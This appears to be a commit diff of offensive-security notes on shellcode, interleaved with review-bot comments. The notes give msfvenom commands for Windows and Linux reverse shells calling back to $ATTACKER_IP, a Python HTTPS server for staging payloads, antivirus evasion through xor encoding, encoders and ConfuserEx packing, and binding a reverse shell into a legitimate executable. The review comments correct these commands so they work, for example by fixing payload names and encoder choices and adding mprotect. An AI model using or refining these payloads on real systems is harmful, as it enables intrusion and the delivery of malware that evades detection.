shellcode
parent e9d2df0494
commit 76f57dd84f
@ -3,7 +3,12 @@
|
|||
* [linux syscalls](https://blog.rchapman.org/posts/Linux_System_Call_Table_for_x86_64/) Are used to craft the shellcode in assembly language
|
||||
* [asmtutor.com](https://asmtutor.com) to check the assembly
|
||||
|
||||
## Writing Shellcode
|
||||
## Staged and Unstaged Payloads
|
||||
|
||||
* An unstaged payload is directly embedded in a binary and executes as is. This may be used to start malicious payload which does not need a remote connection or nearly none.
|
||||
* A small stub of the staged payload is embedded in the binary and should load additional instructions from remote which build the final reverse shell. The downloaded part will only reside in memory. The downloaded shellcode can be changed
|
||||
|
||||
## Writing Shellcode Manually
|
||||
|
||||
* Executing the shellcode relies on syscalls of the system
|
||||
|
||||
|
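Review bot: the second bullet of the new "Staged and Unstaged Payloads" section stops mid-sentence ("The downloaded shellcode can be changed"); either finish the thought (what can be changed, and why that matters compared with the embedded stub) or drop the fragment. In the first bullet "which does not need a remote connection or nearly none" is unclear; say that an unstaged payload carries everything it needs and therefore runs without fetching anything from the attacker. Also consider "Stageless" rather than "Unstaged" in the heading, since the msfvenom section added further down already says "Stageless payloads", and "Are used" in the syscalls bullet should be lowercase.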
@ -53,7 +58,7 @@ MESSAGE:
|
|||
db "Hello, world!", 0dh, 0ah
|
||||
```
|
||||
|
||||
## Compilation
|
||||
### Compilation
|
||||
|
||||
* Compile and link 32 bit
|
||||
```sh
|
||||
|
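Review bot: the demotion to `### Compilation` is consistent with the new `## Writing Shellcode Manually` parent, but the context line above it terminates the string with `0dh, 0ah` (CRLF) right before the Linux "Compile and link 32 bit" step; a bare `0ah` is all write(2) needs on Linux and it saves a byte in the extracted shellcode.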
@ -67,7 +72,7 @@ nasm -f elf64 helloworld.asm
|
|||
ld helloworld.o -o helloworld
|
||||
```
|
||||
|
||||
## Dump the binary
|
||||
### Dump the binary
|
||||
|
||||
* Dump the binary with `objdump -d helloworld` and take a look at the text section
|
||||
* Dump the text section into a file via
|
||||
|
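Review bot: "take a look at the text section" should say what to look for. In the `objdump -d helloworld` output check the opcode column for `00` bytes (they break any delivery that treats the payload as a C string, which is why the msfvenom commands in the other file of this commit pass `-b '\x00'`) and for absolute operands, e.g. the address of `MESSAGE`, which will not be valid once the bytes run inside another process. `objdump -d -M intel helloworld` gives Intel syntax matching the NASM source.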
@ -75,7 +80,7 @@ ld helloworld.o -o helloworld
|
|||
objcopy -j .text -O binary helloworld helloworld.text
|
||||
```
|
||||
|
||||
## Format the Shellcode
|
||||
### Format the Shellcode
|
||||
|
||||
* Format and test the code by dumping it into a c file
|
||||
```
|
||||
|
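Review bot: `objcopy -j .text -O binary` copies only `.text`, so the `MESSAGE:` string (`db "Hello, world!", 0dh, 0ah` in the hunk above) survives only if it is placed in `.text` and referenced RIP-relative (`lea rsi, [rel MESSAGE]`); if it sits in `.data`, the extracted bytes point at an address that does not exist in the C harness and the "test the code by dumping it into a c file" step crashes. Worth stating next to the command, or pushing the string onto the stack instead of labelling it.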
@ -88,3 +93,15 @@ echo -e "\n\t(*(void(*)())helloworld_text)();\n\treturn 0;\n}" >> helloworld.c
|
|||
```sh
|
||||
gcc -z execstack -g -o helloworld helloworld.c
|
||||
```
|
||||
|
||||
## Automated Shellcode Generation
|
||||
|
||||
* Automate the creation via msfvenom
|
||||
* Staged payloads look like this
|
||||
```sh
|
||||
msfvenom -p linux/x64/meterpreter/reverse_tcp
|
||||
```
|
||||
* Stageless payloads look like this
|
||||
```sh
|
||||
msfvenom -p linux/x64/meterpreter/reverse_tcp
|
||||
```
|
||||
|
|
|
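Review bot: the "Staged" and "Stageless" examples are identical (`msfvenom -p linux/x64/meterpreter/reverse_tcp` in both blocks); the stageless variant is spelled with an underscore, `linux/x64/meterpreter_reverse_tcp`, and both commands need `LHOST=`/`LPORT=` and an output format (`-f raw`, `-f c`) to produce usable bytes. Separately, `gcc -z execstack` only marks the stack executable: on x86-64 kernels from 5.8 on that no longer implies an executable `.data`, so `(*(void(*)())helloworld_text)()` on a global array faults there. `mprotect` the page-aligned array with `PROT_READ|PROT_WRITE|PROT_EXEC` before the call, or copy the bytes into an `mmap`'d `PROT_EXEC` region, mirroring the `VirtualProtect` call the Windows notes in this commit use.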
@ -14,7 +14,82 @@ Multiple sections inside the PE can be used to insert the shellcode. This is def
|
|||
|
||||
## Crafting Shellcode
|
||||
|
||||
* Use msfvenom to generate shellcode which executes the calculator
|
||||
```sh
|
||||
msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -f c -o stage.c
|
||||
```
|
||||
* Fill in the the missing parts to make it a valid c file
|
||||
```sh
|
||||
sed -i '1s/^/#include <windows.h>\n/' stage.c
|
||||
sed -i 's/=/= {/' stage.c
|
||||
sed -i 's/;/};/' stage.c
|
||||
echo -e "int main (void) {\n\tDWORD _protect;\n\tVirtualProtect(buf, sizeof(buf), PAGE_EXECUTE_READ, &_protect);\n\tint (*shellcode)() = (int(*)())(void *)buf;\n\tshellcode();\n\treturn 0;\n}" >> stage.c
|
||||
```
|
||||
|
||||
* Compile it
|
||||
```sh
|
||||
i686-w64-mingw32-gcc stage.c -o vcalc.exe
|
||||
```
|
||||
|
||||
### Compile C#
|
||||
|
||||
The Microsoft Visual C# compiler is called via
|
||||
```sh
|
||||
csc file.cs
|
||||
```
|
||||
|
||||
## Staged C2
|
||||
|
||||
* The stage on the target needs to download further parts of the shell into memory
|
||||
* These parts may be generated in one of the following ways (all of them will be found through AV)
|
||||
```sh
|
||||
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f raw -o shell.bin -b '\x00\x0a\x0d'
|
||||
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f raw -o shellcode.bin -b '\x00' -e x86/shikata_ga_nai -i 3 -f csharp
|
||||
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -f exe --encrypt xor --encrypt-key "verysecretkey" -o xored-revshell.exe
|
||||
```
|
||||
* Generate certificate for the webserver
|
||||
```sh
|
||||
openssl req -new -x509 -keyout webserver.pem -out webserver.pem -days 365 -nodes
|
||||
```
|
||||
* Start the webserver
|
||||
```sh
|
||||
sudo python -c "import http.server, ssl;server_address=('0.0.0.0',443);httpd=http.server.HTTPServer(server_address,http.server.SimpleHTTPRequestHandler);httpd.socket=ssl.wrap_socket(httpd.socket,server_side=True,certfile='webserver.pem',ssl_version=ssl.PROTOCOL_TLSv1_2);httpd.serve_forever()"
|
||||
```
|
||||
|
||||
## Generate Custom Shellcode
|
||||
|
||||
* The target is to bypass the AV
|
||||
|
||||
### Xor and Encode
|
||||
|
||||
```sh
|
||||
msfvenom LHOST=$ATTACKER_IP LPORT=443 -p windows/x64/shell_reverse_tcp -f csharp
|
||||
```
|
||||
* Xor and encode the payload, decode the payload on target before it is executed
|
||||
|
||||
### Packer
|
||||
|
||||
* Compress and obfuscate shellcode inside a binary
|
||||
* Obviously, an unpacker is needed inside the binary in addition to the packed code
|
||||
* [mkaring's confuserx](https://github.com/mkaring/ConfuserEx)
|
||||
* Select the directory and binary
|
||||
* Go to settings, use packet and create Rules
|
||||
* Edit the rule as well
|
||||
* Go to Protect and click the button
|
||||
|
||||
### Binding
|
||||
|
||||
* Used to merge binaries
|
||||
* Shellcode will be merged into a legitimate PE and run as an additional thread
|
||||
```sh
|
||||
msfvenom -x legitimate.exe -k -p windows/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4711 -f exe -o notsolegitimate.exe
|
||||
```
|
||||
* Binded PEs need some disguising as well
|
||||
|
||||
## Tools & Tipps
|
||||
|
||||
* [hasherezade's PE-bear](https://github.com/hasherezade/pe-bear-releases.git) gives an overview of the PE's sections
|
||||
* [asmtutor.com](https://asmtutor.com)
|
||||
* [mvelazc0's staged payload](https://github.com/mvelazc0/defcon27_csharp_workshop/blob/master/Labs/lab2/2.cs)
|
||||
|
||||
|
||||
|
|
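Review bot: in the "Staged C2" block the second command passes `-f` twice (`-f raw -o shellcode.bin ... -f csharp`; the last one wins, so shellcode.bin ends up holding C# source) and applies the x86-only `x86/shikata_ga_nai` to a `windows/x64` payload, whose decoder stub will not run as 64-bit code; use an x64 encoder (`x64/xor_dynamic`, `x64/zutto_dekiru`) or drop `-e`. The block also contradicts its own bullet: the first two commands emit complete stageless `shell_reverse_tcp` shells and the third a staged `.exe`, none of which is "further parts of the shell" that a stage downloads into memory; say which one the stage fetches (then `-f raw` or `-f csharp`, not `-f exe`). The web server uses `ssl.wrap_socket`, which was removed in Python 3.12: build an `ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)`, `load_cert_chain('webserver.pem')`, call `ctx.wrap_socket(httpd.socket, server_side=True)`, and invoke `python3` explicitly. In "Crafting Shellcode" the `VirtualProtect` result is never checked before the jump, and the `sed` brace edits are unnecessary since `-f c` already writes a valid `unsigned char buf[] = "..."` initializer. "Xor and Encode" tells the reader to decode on the target but shows no decoder. In "Binding" `LHOST=ATTACKER_IP` lacks the `$` used in every other command. Typos: "the the missing parts", "use packet" (packer), "Binded PEs" (bound), "Tipps" (tips).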